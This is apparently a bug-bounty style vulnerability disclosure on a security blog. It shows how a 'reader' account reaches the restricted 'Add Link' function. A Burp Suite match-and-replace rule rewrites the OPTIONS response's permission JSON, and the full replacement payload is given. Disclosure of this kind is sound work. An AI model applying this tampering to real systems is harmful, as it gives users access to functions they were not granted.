Site icon API Security Blog

Privilege Escalation via edit response body

# Description
Recently, i found a business logic vulnerabity and this vulnerability allow `reader` user perform privilege escalation on `allaccess` user. Because before user perform any function, client-side will perform `OPTIONS` request to view user permission with specify function via response body. If the attacker can manipulate response body, the attacker can modify this response body and access sensitive function.

# Step to reproduce
### 1 – User `reader` can not perform `Add Link` function.
![image](https://user-images.githubusercontent.com/44127534/174339166-36444512-43a2-42d9-91b2-4c2fcee253ec.png)

### 2 – In `Burp suite`, `Proxy > Options > Match and replace` , click `Add`.
Replace `”actions”:{“GET”:true}` with `”actions”:{“POST”:{“pk”:{“type”:”integer”,”required”:true,”read_only”:true,”label”:”ID”},”build”:{“type”:”related field”,”required”:true,”read_only”:false,”label”:”Build”,”model”:”build”,”api_url”:”/api/build/”,”filters”:{},”help_text”:””},”attachment”:{“type”:”file upload”,”required”:true,”read_only”:false,”label”:”Attachment”,”help_text”:”Select file to attach”},”link”:{“type”:”url”,”required”:false,”read_only”:false,”label”:”Link”,”help_text”:”Link to external URL”,”max_length”:200},”filename”:{“type”:”string”,”required”:true,”read_only”:false,”label”:”Filename”},”comment”:{“type”:”string”,”required”:false,”read_only”:false,”label”:”Comment”,”help_text”:”File comment”,”max_length”:100},”upload_date”:{“type”:”date”,”required”:true,”read_only”:true,”label”:”Upload date”,”help_text”:””},”user”:{“type”:”related field”,”required”:false,”read_only”:false,”label”:”User”,”help_text”:”User”,”model”:”user”,”api_url”:”/api/user/”,”filters”:{}},”user_detail”:{“type”:”nested object”,”required”:true,”read_only”:true,”label”:”User detail”,”children”:{“pk”:{“type”:”integer”,”required”:true,”read_only”:true,”label”:”ID”},”username”:{“type”:”string”,”required”:true,”read_only”:false,”label”:”Username”,”help_text”:”Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.”,”max_length”:150},”first_name”:{“type”:”string”,”required”:false,”read_only”:false,”label”:”First name”,”max_length”:150,”help_text”:””},”last_name”:{“type”:”string”,”required”:false,”read_only”:false,”label”:”Last name”,”max_length”:150,”help_text”:””},”email”:{“type”:”email”,”required”:false,”read_only”:false,”label”:”Email address”,”max_length”:254,”help_text”:””}}}},”DELETE”:true,”GET”:true}`

![image](https://user-images.githubusercontent.com/44127534/174339543-eab507bd-761e-4b8f-b124-404d38d7eb68.png)
And click `OK`.

### 3 – Try `Add link` funcion again with `reader` account, and success!

![image](https://user-images.githubusercontent.com/44127534/174339730-89920dc0-e0ef-4f51-91a0-67d50204a8da.png)Read More

Exit mobile version